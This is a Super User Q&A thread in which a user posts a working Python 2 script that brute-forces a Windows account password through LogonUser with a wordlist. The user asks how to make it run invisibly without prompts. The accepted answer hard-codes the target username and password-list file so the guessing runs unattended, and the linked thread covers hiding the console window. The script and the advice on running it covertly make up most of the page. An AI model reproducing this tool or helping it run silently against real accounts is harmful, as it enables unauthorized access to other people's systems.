# How to silently run a batch file with Python without having prompts come up?

Tags: cmd.exe

### Issue

When I run my python script for like in the below example:

```
c:/python
tool.py
```

When I run this it asks me to type the username in manually the scan and then ask it asks me to type file name manually containing the other information needed.

---

### Question

I have another solution from [another post](https://superuser.com/questions/1113796/how-to-run-an-invisible-cmd-exe-command-i-e-c-tool-py-and-make-it-visibl) how to run this process invisible but it is still prompting me for these values when run, and I'd like it to just run without prompting me for these values.

---

### Python Script

```
def verify_success(username, password):
    from win32security import LogonUser
    from win32con import LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT
    if password == 'BLANK':
        try:
            password = ""
            LogonUser(username, None, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT)
            return True
        except Exception, e:
            if "blank passwords" in str(e):
                return True
            else:
                return False
    else:
        try:
            LogonUser(username, None, password, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT)
            return True
        except Exception, e:
            return False


u = raw_input('Enter the username you want to brute: ')
fis = raw_input('Enter the password_list file: ')

pwds = open(fis,'rU')
passwds = pwds.readlines()

for password in passwds:

    if password.rstrip() == "%user%":
        password = u.rstrip()
    if password.rstrip() == "%user%1":
        password = u.rstrip()+'1'
    if password.rstrip() == "%user%12":
        password = u.rstrip()+'12'
    if password.rstrip() == "%user%123":
        password = u.rstrip()+'123'

    if verify_success(u, password.rstrip()):
        print 'SUCCESS: => USERNAME: '+u+' '+'PASSWORD: '+password.rstrip()
        break
    else:
        print '[+]Trying: '+u+' '+password.rstrip()
```

Comment: Is this question about a problem within your `tool.py` or modifying it to suit your needs?

Comment: Do you want to run the program visibly to begin with so that you can type to it and *then* hide it, or do you want it to automatically take those options and always be hidden?

Comment: look this thread, as u can see the .bat file dnesn't have that option to writte the username etc...manually or automatically: (tool.py ask that)   http://superuser.com/questions/1113796/how-to-run-an-invisible-cmd-exe-command-i-e-c-tool-py-and-make-it-visibl/1113801?noredirect=1#comment1587821_1113801

Answer (score 1, accepted):

### The Reason

The Python script uses `raw_input` functions, so it will *prompt* what to set those variable values to be.

> <sub>**raw_input([prompt])**</sub>
>
> > <sub>*If the prompt argument is present, it is written to standard output
> >     without a trailing newline. The function then reads a line from input,
> >     converts it to a string (stripping a trailing newline), and returns
> >     that. When EOF is read, [EOFError](https://docs.python.org/2/library/exceptions.html#exceptions.EOFError) is raised.*</sub>
>
> <sub><sub>[source](https://docs.python.org/2/library/functions.html#raw_input)</sub></sub>

---

### The Fix

To resolve this issue, simply change this part of the logic to use [variables](https://en.wikibooks.org/wiki/Python_Programming/Variables_and_Strings) instead, and set the values to be what they need to be.

> ### <sub>[Variables](https://en.wikibooks.org/wiki/Python_Programming/Variables_and_Strings)</sub>
>
> <sub>A variable is something that holds a value that may change. In
>   simplest terms, a variable is just a box that you can put stuff in.
>   You can use variables to store all kinds of stuff, but for now, we are
>   just going to look at storing numbers in variables.</sub>
>
> ```
> lucky = 7 
> print (lucky) 
> 7
> ```
>
> <sub><sub>[source](https://en.wikibooks.org/wiki/Python_Programming/Variables_and_Strings)</sub></sub>

---

### Explained Changes

In your python script you will want to change the **old logic** to look like the **new logic**. This will prevent the prompt pop up where you enter these values in interactively.

You will just need to ensure that you set the `<username>` and the `<file.txt>` values to be what you need those to be statically. Once you make these changes, the prompting should cease.

**Old Logic (to remove)**

```
u = raw_input('Enter the username you want to brute: ')
fis = raw_input('Enter the password_list file: ')
```

**New Logic (to include)**

```
u = "<username>"
fis = "<file.txt>"
```

---

### Further Resources

- [**raw_input - function**](https://docs.python.org/2/library/functions.html#raw_input)
- [**Python Programming/Variables and Strings**](https://en.wikibooks.org/wiki/Python_Programming/Variables_and_Strings)

Comment: Hi @Homey_D_Clown_IT did u tried?or u can try this weend pls?ur my only , last hope,thank you and have a wonderfull weekend

Comment: @MunteanCosmin What's up!!